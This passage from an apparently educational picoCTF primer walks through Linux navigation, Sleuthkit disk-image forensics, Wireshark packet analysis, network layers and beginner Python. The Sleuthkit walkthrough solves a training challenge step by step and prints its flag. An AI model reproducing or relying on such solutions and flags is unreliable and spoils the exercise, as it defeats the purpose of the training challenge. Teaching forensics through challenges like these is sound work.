To get Tab to autocomplete type the following unambiguous directory name and then strike tab: `$ cd ad` When you press tab, it becomes: `$ cd adequate_books/` One last note on tab completion. When there is an ambiguous file name that doesn’t tab complete to something, you can hit the tab key again to see the list of files that could be completed with your given prefix. The other possibility is that there are zero matches on your given prefix, in which case nothing is printed when you hit tab a second time. So now we are in 'adequate_books', what’s next? From our found file above, 'more_books' is after 'adequate_books', so we cd accordingly: `$ cd more_books/` For this directory, observe the difference between `ls -l` and `ls -al` . You’ll see that an additional directory is shown when the '-a' flag is given. This flag means 'show all (including hidden files and directories)'. In Linux, any file or directory starting with '.' is considered hidden and will only be shown in specific circumstances. ``` $ cd .secret/ $ cd deeper_secrets/ $ cd deepest_secrets/ ``` All of these cd commands could be combined into a single command, but I’ve broken them up here for clarity and exposition. List the contents of 'deepest_secrets': `$ ls -al` To see the contents of the file, use `cat` : `$ cat uber-secret.txt` There’s the flag for this challenge! Try this slightly more difficult challenge with your new found skills: ### 3.3. Disk analysis One of the most fundamental skills of a forensics analyst is inspecting and deeply understanding disks. These can be actual hardware or dumps of disks captured in files. There are a few really good GUI tools out there for not just disk analysis, but whole management of digital evidence for cases. Our disk analysis problems will not require any licenses to proprietary software. Some people like to use Autopsy which is a GUI frontend to the tools we will demonstrate how to use in this section. 
We will use the individual Sleuthkit tools so that you learn a little more than from a GUI that abstracts away some of the details. Disks are all about the details. #### 3.3.1. Sleuthkit Intro presentation We will be considering disk images exclusively, due to the difficulty of sending real hard drives through the Internet at the time of this writing! Try this picoGym problem, which presents the first step in analyzing disk images: This problem should be pretty approachable given what you’ve done leading up to this point, namely downloading individual challenge files and using command line utilities. Something new in this challenge is using netcat or `nc` . For this challenge, nc is used to access a checker program. This program will check your answer to the challenge and give you the flag if it is correct. For this challenge, the invocation of nc (what you type to run it) is given and is straightforward, but I will explain it for the sake of clarity. Here’s my given nc invocation: `nc saturn.picoctf.net 52279` The last number might be different for you, that’s expected. We’ll go through what each part of this program call means: - `nc` This, of course, is the name of the program we are running. Netcat, or 'nc' as this system calls it. Sometimes the program name will be the full 'netcat' variety, but on the webshell, it is 'nc'. - `saturn.picoctf.net` This is the name of the computer we’re connecting to. This is a challenge server that picoCTF runs. - `52279` This is the number of the port we’re connecting to for the challenge. This will probably be different for your challenge. So go ahead and solve your first Sleuthkit problem on the picoGym and learn the tool, `mmls` , which we will use for subsequent problems. #### 3.3.2. Sleuthkit Apprentice walkthrough Here’s the next challenge in that short series: This challenge requires `mmls` as a first step to use other Sleuthkit tools, but now is the time for some true forensic background. 
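As an aside, it can demystify `nc` to see roughly what it does in code. The sketch below is a stand-in written in Python: instead of contacting the real challenge server, it starts a tiny local "checker" on your own machine and then connects to it the way `nc` would. The fake flag and the OS-assigned port are assumptions for illustration only, not the real picoCTF server behavior.

```python
import socket
import threading

# A tiny local stand-in for a challenge checker: it accepts one
# connection, sends a fake flag, and closes. The real picoCTF checker
# at saturn.picoctf.net does more, but the connection mechanics are
# the same.
FAKE_FLAG = b"picoCTF{example_flag}\n"

def checker_server(server_sock):
    conn, _addr = server_sock.accept()
    conn.sendall(FAKE_FLAG)
    conn.close()

# Bind to port 0 so the OS picks a free port, much like the
# random-looking port numbers picoCTF assigns per challenge instance.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))
server.listen(1)
port = server.getsockname()[1]
threading.Thread(target=checker_server, args=(server,), daemon=True).start()

# This part is the "nc" equivalent: connect to a host and port, then
# read whatever the server sends back.
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", port))
data = client.recv(1024)
client.close()
print(data.decode().strip())
```

Running `nc 127.0.0.1 <port>` against such a server would print the same line; `nc host port` is, at heart, just "connect a socket and shuttle bytes".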
A disk image is a huge dump of many numbers. But these numbers have an invisible structure to them that gives them much more meaning. Navigating this invisible structure manually is tedious and deeply difficult, but the Sleuthkit tools handle this invisible structure for us. To begin using the Sleuthkit tools we must understand some of the layers that apply to disk images. The four main layers are: media, block, inode, and filename. - Media: the media layer tools all are prepended with 'mm' and operate on the disk image with little guidance from the analyst. `mmls` is a media layer tool that gives us the partition table of the image and key information for delving into the other layers. Media is the lowest level, providing key information to access the deeper layers, but not shedding much light on the data contained in the image. - Block: the block layer is the second lowest level of the four layers considered here. Block layer tools are prepended with 'blk' in the Sleuthkit. `blkcat` is a block layer tool that outputs the contents of a single block. The block layer is the numbers of the disk image broken into equal-sized chunks. A single file is likely to contain multiple blocks. - Inode: the inode layer is the bookkeeping layer of a disk image. It’s like the table of contents, with the chapter numbers being like the inodes, and the pages like the blocks of a file. Inode layer tools are prepended with 'i'. `icat` is an inode layer tool that outputs a single file based on its inode number. - Filename: the filename layer is one layer that most any user of a computer actually sees and interacts with. This is the layer with which we will start our exploration of the Sleuthkit in the current challenge. Interacting with the filename layer will look a lot like using the shell normally. Filename layer tools are prepended by 'f'. `fls` lists the files on an image starting at the root. This is what we will use for our exploration of the disk image. 
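Before running the tools, it may help to see that the media layer really is just bytes at fixed offsets. The sketch below builds a synthetic one-sector MBR in Python and decodes a partition entry, which is conceptually what `mmls` does when it prints a DOS partition table. The partition values here are made up for illustration; real images have more entries and more edge cases.

```python
import struct

# A disk sector is 512 bytes; mmls reports everything in these units.
SECTOR = 512

# One 16-byte MBR partition entry: status byte, CHS start (3 bytes),
# partition type, CHS end (3 bytes), LBA start sector (4 bytes,
# little-endian), sector count (4 bytes, little-endian).
entry = struct.pack("<B3sB3sII",
                    0x00, b"\x00\x00\x00",
                    0x83,                    # 0x83 = "Linux" partition type
                    b"\x00\x00\x00",
                    2048, 204800)            # made-up start and length

# The partition table lives at byte offset 446; the sector ends with
# the 0x55AA boot signature.
mbr = b"\x00" * 446 + entry + b"\x00" * 48 + b"\x55\xaa"
assert len(mbr) == SECTOR

# Decode the first entry back out of the table area.
status, _, ptype, _, lba_start, count = struct.unpack_from("<B3sB3sII", mbr, 446)
print(f"type=0x{ptype:02x} start={lba_start} length={count}")
print(f"byte offset of partition: {lba_start * SECTOR}")  # prints 1048576
```

That "start times 512" multiplication is exactly why `mmls` prints "Units are in 512-byte sectors", and why you hand its Start value to other Sleuthkit tools as an offset.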
First off, download the challenge file:

`$ wget https://artifacts.picoctf.net/c/331/disk.flag.img.gz`

Next, decompress the challenge file:

`$ gunzip disk.flag.img.gz`

Dump the partition table of the disk image. We want to find the offset to the main partition:

```
$ mmls disk.flag.img
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000002047   0000002048   Unallocated
002:  000:000   0000002048   0000206847   0000204800   Linux (0x83)
003:  000:001   0000206848   0000360447   0000153600   Linux Swap / Solaris x86 (0x82)
004:  000:002   0000360448   0000614399   0000253952   Linux (0x83)
```

It would seem that the fourth partition (slot 004) is the main partition, because it is the larger of the two. That's a bit of a guess, but it's for sure one of the two partitions labeled 'Linux (0x83)'. Copy the 'Start' value of the fourth partition to your clipboard. Let's look at the root of this partition by supplying the 'Start' value to the offset option in `fls`:

```
$ fls -o 360448 disk.flag.img
d/d 11:   lost+found
d/d 12:   boot
d/d 1985: etc
d/d 1986: proc
d/d 1987: dev
d/d 1988: tmp
d/d 1989: lib
d/d 1990: var
d/d 3969: usr
d/d 3970: bin
d/d 1991: sbin
d/d 451:  home
d/d 1992: media
d/d 1993: mnt
d/d 1994: opt
d/d 1995: root
d/d 1996: run
d/d 1997: srv
d/d 1998: sys
d/d 2358: swap
V/V 31745:      $OrphanFiles
```

This looks like the main partition because it has many of the standard Linux root directories, like 'home', 'usr', 'root', etc. Remember that `fls` is part of the filename layer Sleuthkit tools. You can think of `fls` as standing for 'filename list'. Here, it has listed all the top-level directories in the disk image. This next part requires some forensic intuition. A lot of these directories are system-generated and maintained. Let's focus on the directories that have a lot of potential user influence, like `root` and `home`.
But first, let’s take a step back and print the help information for `fls` : `$ fls` `fls` will print some succinct help information if ran with no arguments. This is true for many command line tools and programs, but is not universal. ``` $ fls Missing image name usage: fls [-adDFlhpruvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-m dir/] [-o imgoffset] [-z ZONE] [-s seconds] image [images] [inode] If [inode] is not given, the root directory is used -a: Display "." and ".." entries -d: Display deleted entries only -D: Display only directories -F: Display only files -l: Display long version (like ls -l) -i imgtype: Format of image file (use '-i list' for supported types) -b dev_sector_size: The size (in bytes) of the device sectors -f fstype: File system type (use '-f list' for supported types) -m: Display output in mactime input format with dir/ as the actual mount point of the image -h: Include MD5 checksum hash in mactime output -o imgoffset: Offset into image file (in sectors) -p: Display full path for each file -r: Recurse on directory entries -u: Display undeleted entries only -v: verbose output to stderr -V: Print version -z: Time zone of original machine (i.e. EST5EDT or GMT) (only useful with -l) -s seconds: Time skew of original machine (in seconds) (only useful with -l & -m) ``` The first line after our `fls` invocation with no arguments is an error message, saying that we failed to include a mandatory argument, the image name. However, `fls` uses the opportunity to educate us on how to properly invoke it. All arguments in square brackets, i.e. '[' and ']', are optional. Anything not in square brackets is mandatory. After the invocation is a helpful note saying 'If [inode] is not given, the root directory is used'. This is how we first used `fls` . We supplied no inode and the root directory was printed. But now, we want to look at specific directories so we will need their inodes. 
Helpfully, `fls` actually prints those along with file and directory names. It's the number on the line with each name; if we look back to our listing from '$ fls -o 360448 disk.flag.img', we can find the inode number for `/home`, which is 451. Let's add that to our `fls` call:

```
$ fls -o 360448 disk.flag.img 451
$
```

This actually seems to do nothing. It's not actually doing nothing; there are simply no results. `/home` is an empty folder in the disk image. Let's try another directory, `/root`. Go back and get the inode number and plug it into `fls`:

```
$ fls -o 360448 disk.flag.img 1995
r/r 2363:       .ash_history
d/d 3981:       my_folder
```

This directory has a file called `.ash_history` and a directory named `my_folder`. Let's see what is in 'my_folder'. Use the inode number like before:

```
$ fls -o 360448 disk.flag.img 3981
r/r * 2082(realloc):    flag.txt
r/r 2371:       flag.uni.txt
```

Bingo! Now, with the inode number of 'flag.uni.txt', we can print the file using `icat`:

```
$ icat -o 360448 disk.flag.img 2371
picoCTF{by73_5urf3r_adac6cb4}
```

Please be aware that your flag will likely have a different suffix. Now, it's good to go back and address what the other file in 'my_folder' was. Its name is flag.txt, so why can't we `icat` that file? In short, because the file has been deleted and the inode has even been reassigned to a different file. You can try using `icat` on the 2082 inode, but it is part of an unrelated file somewhere on the system.

If you want to continue to learn about Sleuthkit tools, try this problem:

If you want to use what you know to dive even deeper into a disk, try this problem:

If you get stuck, try reading writeups of the challenges. Just Google search 'Writeup, [challenge name], picoCTF'. There are going to be various levels of quality and depth in writeups, so don't feel like you have to stick with the first one you look at.

### 3.4. Packet analysis

Another important field of forensics is packet or network analysis.
This field of forensics concerns itself with understanding what has happened on a network through the examination of captured packets. This will require the use of a GUI tool called 'Wireshark', which means you cannot use the webshell to complete this problem. The webshell can be used to complete many introductory problems, but more advanced problems sometimes need a GUI tool to be solved in an efficient manner. Consider this an exercise in installing and using GUI tools. Knowing how to do this will help you greatly in the future.

#### 3.4.1. Installing Wireshark

On your computer, download Wireshark from their site:

You must download the version corresponding to your operating system. It should be a straightforward process; however, if you have any issue or doubt, you can Google plenty of good documentation about Wireshark. If you're using a Chromebook, you will need administrator privileges to enable Linux mode on the device. With Linux mode enabled, you can install Wireshark through apt-get and run it with the Linux terminal.

#### 3.4.2. Packet Primer walkthrough

Consider this picoCTF challenge:

Download the packet capture and open it in Wireshark. It should look like this once you open it. Google how to open a packet capture in Wireshark if you can't figure it out by exploring the menus of the tool. Packet analysis is all about filtering, even for this packet capture, which is tiny. Most packet captures are going to have thousands, if not tens of thousands, of packets. This capture has only 9 packets because it is an introductory problem. You could manually inspect each packet, and that wouldn't be a bad strategy, but we want to approach this problem more technically, because it is just setting us up for future problems that have thousands of packets. So, we know that the flag is unlikely to be in the ARP messages, as these are just messages relating IP addresses and hardware addresses.
To filter out ARP messages, add `!arp` to your filter in Wireshark:

'ARP' stands for Address Resolution Protocol, and these messages are common in every network capture, as ARP is needed to connect a hardware address to an IP address.

Of the remaining 5 packets, the first 3 are the TCP handshake, and so they can be ignored. Of the remaining 2 packets, let's look at the one that has the PSH flag set, which means there is data for the application in the packet:

The TCP handshake, also known as the 'three-way handshake', can be identified by the flags in the packets: first 'SYN' from host A, then 'SYN, ACK' from host B, then finally 'ACK' from host A. 'SYN' stands for synchronization, and 'ACK' stands for acknowledgement. Both parties synchronize and acknowledge.

When you click on packet 4, you should see the flag in the packet bytes pane; you may have to scroll down to see it all:

Remember, your flag might be different than mine. It would be good to notice that there was something different about the packet with the flag from the beginning. It has a protocol of 'S101', and it's the only one. Such glaring oddities should always be examined. Sometimes, the only clue in a packet analysis problem is a small difference between the flag packet and the rest of the thousands of packets. A good strategy is to filter out as many packets as you can, then look for oddities. I should note also that there is not always a 'flag packet'. Sometimes a flag can span multiple packets, just like packet payloads can span multiple packets.

'S101' is an uncommon protocol. The packet isn't really speaking S101; it is just using the preferred port of the protocol, port 9000.

Leave your packet capture open if you can. We are going to use it to illustrate concepts introduced in the next section.

#### 3.4.3. Network Layers

We'll now cover some background to deepen your understanding of packets and networks. The networks we commonly use today are broken down into different layers.
This design by layers assigns each layer its own responsibility. It is good to have a design by layers for several reasons. For example, if network engineers want to make a change in one of the layers, the impact on the other layers is minimized. Another example is that if you are a programmer and want to connect your application with a server, you do not necessarily need to care whether the user is on wifi or an ethernet cable, or how the user is connecting to the internet. Your application can simply trust that other layers are going to take care of that, and your application will have a successful connection. These are the layers, viewed in a top-down approach.

- Application layer: Responsible for handling data traffic between applications. HTTP belongs to this layer; the HTTP protocol is commonly used to obtain Web Pages. In the Packets Primer capture, click the fourth packet. This packet's application layer is called 'Data' in the middle pane. Click the arrow to expand the view of the layer. There's not much in this display because the application data is just the flag. Other layers will break down all the fields of a layer, showing the value for each one in the packet.

Figure 6. Application layer expanded

- Transport layer: Responsible for providing several connections on the same host. That means you can have several applications on the same device, and each of them can have a different connection, even if it is just one device. It also defines functionalities for reliable transport. Two protocols are used on this layer. TCP (Transmission Control Protocol): you use this protocol when you need reliable transport; it makes sure that if a piece of information went missing while being transferred, it is resent. HTTP from the Application layer runs on top of TCP, because when you visit a Web Page you want every part of it delivered accurately.
On the other hand, when you don't need reliable transport, but you want faster transport that does not resend parts that were missing, UDP (User Datagram Protocol) is used. An example of when UDP is needed is voice communication. When you are talking, if a little part of the audio is missing, you do not want it to appear later in the communication, because that would confuse the listener. The listener can still understand what you are saying if the missing part is small enough. Since UDP has no controls for transport, it is faster than TCP. This layer assigns a port to each connection, and that is how it tells the difference between connections on the same computer: by the port.

- Network layer: It provides devices with an address in the network, called the IP (Internet Protocol) address, and routes information through different routers. It provides mapping between all the computers connected to the internet. When you connect to a network in some specific place, an IP is assigned to your device.

- Data link layer: It provides communication between devices that are connected directly. Examples of protocols in the data link layer are Ethernet and WiFi. You generally use WiFi to send messages to your router directly, without any other devices in between. Each device has a physical address in WiFi or Ethernet, known as the MAC address, and the MAC address is what this layer uses. Unlike an IP address, which can change depending on the network you are connected to, the MAC address is assigned to the hardware of your network card when it is manufactured.

- Physical layer: This handles the electrical pulses on the wire that represent bits.

## 4. Programming in python

##### Samuel Sabogal Pardo

A computer program is a set of instructions that allow us to do a task automatically on a computer. We can make a computer program in a programming language. Computer programs are generally called "software". With a computer program we can do all sorts of things.
Some examples are calculators, video games, text processors, browsers, and all the things you have ever used in a computer. Nowadays, there are computers everywhere. Any device such as a cell phone, smart watch, or modern car is running software that was made through programming. To begin, we are going to learn python, which is one of the easiest programming languages to learn. Let's begin writing python! We are not going to explain each detail of python independently. For that, you could read the python documentation, which is located here:

However, if you don't know any programming, going directly to the documentation can be overwhelming. We are just going to explain some parts of python which are a good start to begin to write your own programs to exploit software. We do this by making examples that achieve one objective, and we explain how they work along the way. This will allow you to read code written by someone else, with the help of Google, of course, if they use elements that you did not know previously. When you are learning a programming language, there is a tradition in which the first program you write simply prints "Hello World!" on the screen. We will be using python 3; the number 3 is the version of python. Let's start with the "hello world!" program. Open your shell, go to your home directory, and create a folder called "python_examples". You can do it with the following lines:

```
$ cd
$ mkdir python_examples
```

Now, access that folder using

`$ cd python_examples`

Create a file called "helloworld.py"; you can do it with:

`$ nano helloworld.py`

Making our 'hello world!' program in python requires just one line of code! Simply write this in the file:

`print("Hello World!")`

Now save the file in nano by pressing 'control' and 'x' at the same time, then press 'y', then 'enter'. Run the program in the terminal with:

`$ python3 helloworld.py`

You should see that "Hello World!"
is printed on the screen when you run it:

```
$ python3 helloworld.py
Hello World!
```

That was our first program in python! Python, like any other programming language, has variables. A variable can hold different types of data. What we just printed on the screen was a string of characters. When we enclose something in quotes, we are telling python it is a string of characters. A string is a data type. In python, to create a variable we simply choose a name and assign the value that we want. For example, we are going to create a variable called my_string, and we are going to assign to that variable the value "Hello World!":

`my_string = "Hello World!"`

That line of code makes the variable my_string equal to "Hello World!". In python programming, the symbol = is used to assign the value on the right side of the equals sign to the variable on the left side. Variables can have any name we like, except some specific words that are reserved for python instructions. For example, the word 'for' is reserved, so you cannot use it as a variable name. Now, if we print the variable, it should print "Hello World!". Do that experiment next. The python script should look like this:

```
my_string = "Hello World!"
print(my_string)
```

Run it and you will see "Hello World!" printed on the screen again.

`Hello World!`

You can also assign numbers to variables and do mathematical operations between them. Let's make a simple program that calculates the area of a rectangle. Create a file called "area.py" and write the following:

```
side1 = 4
side2 = 8
result = side1 * side2
print(result)
```

If you run that script, what do you think is going to print? When you run it you should see:

`32`

Those were very trivial examples. Now, suppose you want to print a list of 20 numbers that starts at 0 and ends at 19. We can do that in just a couple of lines, instead of writing 20 prints!
Create a file called loop.py and use the following code:

```
for i in range(20):
    print(i)
```

Run it and you should see:

```
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
```

We have introduced the concept of a python loop. The word 'for' is used to declare a 'for loop', which is a loop that iterates over a range of numbers. The 'i' next to 'for' is a variable that is incremented on each iteration over a range of 20. We can change the range for a bigger one or a smaller one by changing the number inside the parentheses. Note that a line of code is inside the loop if it is indented by four spaces. For example, run this:

```
for i in range(10):
    print("I am inside the loop")
    print(i)
print("I am OUTSIDE")
```

You will see:

```
I am inside the loop
0
I am inside the loop
1
I am inside the loop
2
I am inside the loop
3
I am inside the loop
4
I am inside the loop
5
I am inside the loop
6
I am inside the loop
7
I am inside the loop
8
I am inside the loop
9
I am OUTSIDE
```

Note that the string "I am OUTSIDE" was printed only once, because it is outside the loop. To be inside the loop, the code needs to be indented by 4 spaces, as we said. The first line of code after the loop that is not indented marks the end of the loop. If you try to indent a line after the loop has finished, like this:

```
for i in range(20):
    print("I am inside the loop")
    print(i)
print("I am outside")
    print("I am outside 2")
```

that causes a syntax error when you run it. A syntax error means that the code is not complying with the way python should be written. In this case, it would specifically show an indentation error:

```
python3 loop.py
  File "loop.py", line 5
    print("I am outside 2")
    ^
IndentationError: unexpected indent
```

That happens because we indented a line after the for loop was already closed.
At the beginning, syntax errors can happen by accident, and you might not fix them very easily, but with a little practice you will begin to fix them quickly when they happen. To practice, spot the error in the following code:

```
for i in range(20):
    prin("I am inside the loop")
    print(i)
print("I am outside")
```

What is the error? Run it to see what happens. It will show:

```
python3 loop.py
Traceback (most recent call last):
  File "loop.py", line 2, in <module>
    prin("I am inside the loop")
NameError: name 'prin' is not defined
```

Python shows you the line with the error. In this case we missed the 't' from 'print', so python does not recognize the name 'prin'. (Strictly speaking, this one is a name error rather than a syntax error, but it is caused by the same kind of typo.) Another error might be that the colon from the for loop is missing:

```
for i in range(20)
    print("I am inside the loop")
    print(i)
print("I am outside")
```

In that case it will show you:

```
python3 loop.py
  File "loop.py", line 1
    for i in range(20)
                     ^
SyntaxError: invalid syntax
```

If you add the missing colon after range(20), the program should work. A syntax error can happen because a reserved word is misspelled; remember that reserved words are words that python recognizes as instructions, such as 'for' and 'in' in our program. Additionally, a syntax error can happen because of a missing symbol such as a colon. As a challenge, implement a program that prints your name 10 times, with a number below each name, starting at 100 and ending at 109. The output of your program should look similar to:

```
Samuel
100
Samuel
101
Samuel
102
Samuel
103
Samuel
104
Samuel
105
Samuel
106
Samuel
107
Samuel
108
Samuel
109
```

Hint: use range(100, 110). Once you are done with the previous challenge, fix the following program, which has several syntax errors, and make it work:

```
for i inn range(10:
    prnt(i)
```

The program should print the numbers from 0 to 9. So far, we have seen how a computer can repeat an instruction several times, which is something fundamental in a computer. We want computers to do repetitive tasks for us.
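If you get stuck on the name-printing challenge above, here is one possible solution. The name "Samuel" is taken from the sample output; substitute your own.

```python
# One possible solution to the challenge: print a name 10 times with a
# number below it, counting from 100 to 109. Replace "Samuel" with
# your own name.
name = "Samuel"
for i in range(100, 110):
    print(name)
    print(i)
```

Notice that range(100, 110) stops just before 110, which is why the last number printed is 109.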
Another fundamental functionality we want in computers is conditional clauses. A conditional clause means that a program will do an action only if a condition is met, or take another path if the condition is not met. For example, suppose you are printing the numbers from 0 to 9, and you want to print a message when the number is less than 5 and another message when the number is equal to or greater than 5. You would do it in the following manner:

```
for i in range(10):
    if i < 5:
        print("The following number is less than 5")
    if i >= 5:
        print("The following number is greater than or equal to 5")
    print(i)
```

Run it and verify the results. We have introduced an if-clause, which is a conditional clause. Note that all the code is inside the loop. The first message is inside the first if-clause, which is only fulfilled when 'i' is less than 5. The second message is inside the second if-clause, which is only fulfilled when 'i' is greater than or equal to 5. Lastly, we print the variable 'i', which is not inside any if-clause, so it is always printed. Another way to implement this program is using an 'else':

```
for i in range(10):
    if i < 5:
        print("The following number is less than 5")
    else:
        print("The following number is greater than or equal to 5")
    print(i)
```

When the condition in an if-clause is not met, the program enters the 'else' and executes what is inside.
You should still see this output when you run the program:

```
$ python3 helloworld.py
The following number is less than 5
0
The following number is less than 5
1
The following number is less than 5
2
The following number is less than 5
3
The following number is less than 5
4
The following number is greater than or equal to 5
5
The following number is greater than or equal to 5
6
The following number is greater than or equal to 5
7
The following number is greater than or equal to 5
8
The following number is greater than or equal to 5
9
```

To practice, implement a program that prints a range of 100 numbers and prints a different message when the numbers are smaller than 10, another message when the numbers are between 10 and 50, and another message when the numbers are greater than 50.

### 4.1. Lists

There are several data structures in Python, which are simply structures that organize data in a certain manner. Different data structures have different properties. We are going to introduce one that is called a 'list', which allows us to store several values, one after the other. We create a list like this:

```
my_list = ["I", "Love", "picoCTF"]
print(my_list)
```

We can iterate over the list to operate on each item in any way we want. For example, suppose we want to print each item of the list; we could do this:

```
my_list = ["I", "Love", "picoCTF"]
print(len(my_list))
print(my_list)
for i in my_list:
    print(i)
```

When you run that program, you should see the following output:

```
3
['I', 'Love', 'picoCTF']
I
Love
picoCTF
```

Note that the number 3 printed is the length of the list. You can sort the list alphabetically by calling a method (a function that belongs to the list) like this:

```
my_list = ["this", "is", "not", "ordered", "alphabetically"]
my_list.sort()
for i in my_list:
    print(i)
```

Note that sort() reorders the list in place and returns None, so there is no point in assigning its result to another variable. You should see this output when you run that program:

```
alphabetically
is
not
ordered
this
```

Now, create a list of numbers, and print it backwards!
Using google, it should be very easy to find how to do it.

### 4.2. Functions

If you have a piece of code that you want to use often, copying and pasting it is a bad idea: your code gets longer and harder for a human to read, and if you ever want to modify that piece of code, you have to modify every place where you pasted it. We can overcome that by using functions. A function can receive parameters, which are variables you pass to the function so it can operate on them. Additionally, a function can return a value, which is the result after all the operations are done. Let's see an example of a function that verifies if a number is even or odd. If it is even, it will return True. If it is odd, it will return False. The program receives any number you input and verifies it. Note that the '%' operator in the code is the modulo operator, which calculates the remainder. In this case we calculate the remainder of x divided by 2 and compare that to zero to determine if the number is even or odd. Read the code to understand!

```
def even_odd(x):
    if x % 2 == 0:
        return True
    else:
        return False

print("Input a number:")
my_number = int(input())
if even_odd(my_number):
    print("The number is even")
else:
    print("The number is odd")
```

Run that program and try several numbers!

### 4.3. Input and output

A program might need to interact with a user. For example, a calculator expects the user to enter some numbers before it does the processing. Receiving user input in a terminal is very easy in Python because it has predefined functions that do it for us. The function 'input()' waits until the user writes something in the terminal and presses enter. Note that a function can have zero parameters. The function then returns the string that the user wrote; in the next example we assign it to the variable 'number_iterations'.
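Whatever the user types arrives as a string, so it usually has to be cast with int() before doing arithmetic. A minimal sketch of that conversion, using a fixed string in place of a real input() call:

```python
# Simulate what input() returns: user input always arrives as a string.
user_text = "7"          # pretend the user typed 7 and pressed enter
number = int(user_text)  # cast the string "7" to the integer 7
print(number * 2)        # arithmetic now works: this prints 14
```

If the string cannot be converted (for example, int("hello")), Python raises a ValueError, which we will learn to handle in the try-except section.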
Here is an example in which we allow the user to control the number of iterations of our program:

```
print("Input the number of iterations:")
number_iterations = int(input())
for i in range(number_iterations):
    if i < 5:
        print("The following number is less than 5")
    else:
        print("The following number is greater than or equal to 5")
    print(i)
```

Run that program. When you run it, it will do nothing until you input a number in the terminal and press enter. In other cases, the data we want to input does not have to come from the user. It could come from a file. We can read all the lines from a file using the function 'open'. Create a file called "pico.txt" in the same folder where you are creating the python programs. Then, copy and paste this text into that file:

```
The Cosmos is all that is or was or ever will be.
Our feeblest contemplations of the Cosmos stir us
-- there is a tingling in the spine,
a catch in the voice,
a faint sensation,
as if a distant memory,
of falling from a great height.
We know we are approaching the greatest of mysteries.
```

Save the file. Now, in the same folder, create a program with the following code:

```
filepath = "pico.txt"
i = 1
with open(filepath, "r") as my_file:
    for line in my_file:
        print(i)
        print(line, end="")  # each line already ends with a newline character
        i += 1
```

You should see the following output when you run the program:

```
1
The Cosmos is all that is or was or ever will be.
2
Our feeblest contemplations of the Cosmos stir us
3
-- there is a tingling in the spine,
4
a catch in the voice,
5
a faint sensation,
6
as if a distant memory,
7
of falling from a great height.
8
We know we are approaching the greatest of mysteries.
```

As you saw, this program reads a file and enumerates each line in the output. Note the end="" in the second print: each line read from the file keeps its own newline character at the end, so we tell print not to add another one (otherwise you would see a blank line after every line of text). The 'open' function has two parameters: the first one is the path of the file you want to open, and the second is a string with the letter 'r', which means that we want to **r**ead the file. 'my_file' is simply the variable name we chose for the opened file.
Then, we can iterate over each of the lines of the file in a for loop. Note that this is all done inside a 'with' block. We use the 'with' statement when opening a file so that the file is closed automatically after reading, even if an exception occurs during execution. What that means is that when you open a file, you must close it and make sure that it closes correctly. For example, my_file.close() would close the file. But imagine that along the way, before calling close, something happens and you never reach the line that closes the file: you would have left it open accidentally. Later we will give you more details on exceptions. For the time being, just think of 'with' as an easy way to ensure that the file will be closed correctly. If you want to save your output in another file, you can easily do it in the following manner:

```
filepath_read = "pico.txt"
filepath_write = "outputpico.txt"
i = 1
with open(filepath_read, "r") as file_read:
    with open(filepath_write, "w") as file_write:
        for line in file_read:
            file_write.write(str(i) + "\n")
            file_write.write(line)  # each line already ends with a newline
            i += 1
print("look inside your folder...")
```

We introduced some new concepts in this code. This:

`str(i)`

is a cast from an integer to a string. We want to convert the integer into a string to be able to concatenate two strings. For example, if we have the string "hello" and the integer 123, and we want to create the string "hello123", we can concatenate those two values; but first we need to convert the integer to a string, otherwise Python will show an error. To concatenate strings, we use the operator '+'. When we add two strings, Python concatenates them. When we add two integers, Python does a mathematical addition. To represent a line break in a string, we use "\n". After this explanation, you should know that this:

`str(i) + "\n"`

simply converts an integer to a string, and then concatenates a line break to it.
We do that because the write() function does not add a line break after the string it writes, so without it we would end up with a file containing one single huge line of text. When you run the code, you should see no output in the terminal, but if you show the contents of the folder you are in, you should see a new file called 'outputpico.txt'. If you show the contents of that file, you should see the following:

```
$ cat outputpico.txt
1
The Cosmos is all that is or was or ever will be.
2
Our feeblest contemplations of the Cosmos stir us
3
-- there is a tingling in the spine,
4
a catch in the voice,
5
a faint sensation,
6
as if a distant memory,
7
of falling from a great height.
8
We know we are approaching the greatest of mysteries.
```

We just learned how to read and create files!

### 4.4. Comments

It is a good practice to explain what your code is doing in a comment. That way, the reader of the code, who may be yourself, will understand what some part of the code is doing. You will realize that after you write some code, you forget the exact logic and have to read it again to understand what you did. In short, comments are very important in programming. In Python, you write a comment by adding the '#' symbol; everything from the '#' to the end of the line is ignored by the Python interpreter as if it did not exist, so it does nothing in the program. See the following example:

```
print("Input the number of iterations")

# We read user input and assign it to the variable number_iterations
number_iterations = int(input())

# We iterate according to the value input by the user
for i in range(number_iterations):
    if i < 5:
        # We only print this message when the value of i is less than 5
        print("The following number is less than 5")
    else:
        # We only print this message when the value of i is greater than or equal to 5
        print("The following number is greater than or equal to 5")
    # We always print this
    print(i)
```

### 4.5. Try-except and exceptions

Exceptions are useful in hacking in several cases, for example, when you want an attack to keep executing even if an unknown error occurred. When a program tries to execute an instruction that has correct syntax but cannot be carried out for some other reason, an exception is thrown. For example, a division by zero can be written with perfectly correct syntax, but when the program executes that line it will stop and fail. Let's do the experiment:

```
num1 = 8
print("Input the number that will divide:")
num2 = int(input())
result = num1 / num2
print(result)
print("The program keeps executing to do other stuff...")
```

As you can see, the program divides 8 by any number input by the user. If you run it and input, for example, 2, nothing bad will happen, and you will see this:

```
Input the number that will divide:
2
4.0
The program keeps executing to do other stuff...
```

(Note that the '/' operator in Python 3 always produces a decimal number, which is why it prints 4.0 rather than 4.) Now, run the program again and input 0; you will see this:

```
Input the number that will divide:
0
Traceback (most recent call last):
  File "helloworld.py", line 4, in <module>
    result = num1 / num2
ZeroDivisionError: division by zero
```

An error occurred because you cannot divide by zero. That is a rule of Python and most programming languages. Your program stops when an error happens; further lines are not executed. In this case, you could verify that the number is not zero in an if-clause. For this example, let's fix the program instead using a try-except:

```
num1 = 8
print("Input the number that will divide:")
try:
    num2 = int(input())
    result = num1 / num2
    print(result)
except:
    print("An error has occurred, did you try to divide by zero?")
print("The program keeps executing to do other stuff...")
```

In this code, the same message is printed for any error. Try to input a string instead of 0. It will show the same message.
